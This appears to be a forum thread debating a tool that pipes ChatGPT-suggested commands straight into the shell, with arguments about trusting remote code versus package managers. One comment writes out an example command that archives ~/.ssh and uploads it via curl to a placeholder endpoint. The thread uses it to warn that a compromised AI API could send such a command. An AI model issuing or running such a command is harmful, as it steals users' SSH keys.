Comment by AzzyHN
2 years ago
Terrible idea, I love it
This is a good use case for a well-trained LLM, rather than the broad scope of ChatGPT
It's not a good use case for anything.
Never ask a remote endpoint that you don't own and don't run what commands you should run on your system. And certainly don't execute the answers.
99.9999% of the code running on my machine is written by others and not even readable to me. I'm pretty optimistic that a similar percentage is true on your machines. So yeah, we run remote commands all the time, all of us. There may be a subtle difference between "curl something | bash" and "apt-get install" or "setup.exe", but there is no fundamental one.
Fundamentally:
1. the packages being worked on by Debian et al have a huge pile of infrastructure so that their development happens collaboratively and in the open, with many eyes watching
2. everyone gets the same packages
3. they have their own security teams to _ensure_ everyone is getting the same packages, i.e. that their download servers and checksums haven't been compromised
4. the project has been working since 1993 to ensure their update system, and the system delivered by those updates, works as expected. If it doesn't, there are IRC channels, mailing lists, bug trackers and a pile of humans to discuss issues with, and if they agree it's a bug, they can fix it for everyone
That's not to say it's impossible to sneak an attack past a project dedicated to stopping such attacks, but it's so much more work compared to attacking someone who executes whatever a remote endpoint tells them.
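The checksum machinery in point 3 can be illustrated in miniature. A minimal sketch, with caveats: the filenames are stand-ins, and in practice the checksum file is published (and signed) by the project over a trusted channel rather than generated locally as it is here:

```shell
# Stand-in for a downloaded release artifact.
echo "example payload" > release.tar.gz

# In reality this file comes from the project's release page, usually
# GPG-signed; generating it locally only demonstrates the mechanism.
sha256sum release.tar.gz > SHA256SUMS

# Verification fails loudly if even one byte of the download changed.
sha256sum -c SHA256SUMS
```

Debian's apt does the equivalent automatically: package hashes are listed in Release files that are themselves signed by the distribution's keys, so every user verifies that they received the same bytes as everyone else.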
There's a difference between getting code from a repo and from an AI generator, though. We can apply an ancient thing known as "reputation" to the former. Not yet to the latter.
If we can't let ChatGPT take the wheel, how will we feel alive?
I do envision training a local LLM, which would mostly resolve this concern, but at the moment the vast majority of people don't have a good enough GPU in their system to run an even mildly competent code-generation LLM. I imagine this will change within a few years.
You never search for documentation? From either a first or third party site?
got it, never do apt-get upgrade
Why do you say it's a terrible idea?
I'd say it's a pretty common idea today to ask ChatGPT for help with complicated commands. Putting it in the shell directly is smart and helpful.
Maybe the implementation has some flaws (it seems quite unsafe), but the idea is rather good in my opinion.
Getting a suggested command from a chat bot is not a terrible idea.
Directly executing commands given by a chat bot on your machine without inspecting them first is pure madness.
Here's a hypothetical but entirely plausible scenario: someone discovers a vulnerability in OpenAI's API (vulnerabilities are everywhere these days), you prompt it to do something for you, and it sends back the following command:
tar -czf bla.tar.gz ~/.ssh && curl -X POST -F "ssh_keys=@bla.tar.gz" SOME_HTTP_API_ENDPOINT && rm -f bla.tar.gz && THE_ACTUAL_COMMAND_YOU_PROMPTED
What could possibly go wrong, right?
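One mitigation is to force a human review step between the model's suggestion and the shell. A minimal sketch, assuming the suggestion arrives as a string; `confirm_and_run` is a hypothetical helper, not part of any real tool:

```shell
# Hypothetical guard: print the suggested command and require an
# explicit "y" before eval'ing it. Any other answer aborts.
confirm_and_run() {
  printf 'Suggested command:\n  %s\n' "$1"
  read -r answer
  if [ "$answer" = "y" ]; then
    eval "$1"
  else
    echo "Aborted."
  fi
}

# A declined suggestion is displayed but never executed.
printf 'n\n' | confirm_and_run 'echo hello'
```

Of course, this only helps if the user actually reads the command; it does nothing against a payload obfuscated well enough to pass a casual glance.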
you'd really like http://openinterpreter.com then